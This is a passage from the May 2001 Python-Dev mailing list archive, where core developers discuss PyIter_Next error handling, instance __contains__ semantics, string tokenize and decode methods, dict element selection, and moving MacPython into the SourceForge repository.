raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one at home.com Fri May 4 22:50:03 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. * Else return the next object and set *error=0. */ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if {error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido at digicool.com Sat May 5 00:03:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1. > * If the iteration terminated normally, return NULL and set *error=0. > * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if {error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 23:18:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun! But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp at ActiveState.com Sat May 5 02:03:05 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Sat May 5 05:07:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sat May 5 10:13:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I here no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Sat May 5 13:45:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simle examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:15:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok. I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think hge understands now. > If I here no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:24:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 -0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not. The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation. In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 22:40:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). Will do! From guido at digicool.com Sat May 5 23:48:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. (I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:24:58 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. "except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erronesouly assumed that the looping behavior was *introduced* when __contains__ was added. > ... > No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido at digicool.com Sun May 6 00:31:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>. Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. > > I don't believe I ever knew that! Thanks. I erronesouly assumed that the > looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:53:51 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence ? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul at pfdubois.com Sun May 6 03:10:37 2001 From: paul at pfdubois.com (Paul F. Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause, class X (Y rename a as b, c as d, Z rename foo as bar): someone suggested this was the same as class X (Y, Z): b = Y.a d = Y.c bar = Z.foo I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicity defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson at baltimore.com Sun May 6 18:26:00 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container? If neither, would this be useful, or is it DHG? Thanks Greg From tim.one at home.com Sun May 6 20:15:57 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though: def arb(dict): k, v = pair = dict.popitem() dict[k] = v # restore the entry return pair Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers: def arb(dict): if dict: return dict.iteritems().next() raise KeyError("arb passed an empty dict") > If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful? popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form: while working_set: x, dontcare = working_set.popitem() process(x) # which may add more elts to working_set From jack at oratrix.nl Mon May 7 11:39:43 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:45:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform depende sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:49:17 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis at informatik.hu-berlin.de Mon May 7 11:53:54 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido at digicool.com Mon May 7 16:00:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Mon May 7 15:04:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas at python.ca Mon May 7 15:14:52 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, its still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform depende sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf subsitution? Neil From jack at oratrix.nl Mon May 7 15:17:18 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly. The write permission for other MacPython developers shouldn't be a problem, I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack at oratrix.nl Mon May 7 15:27:14 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? > > How would this work? Would MACHDEP_OBJS be set by an autoconf > subsitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas at python.ca Mon May 7 15:30:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal at lemburg.com Mon May 7 20:44:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> 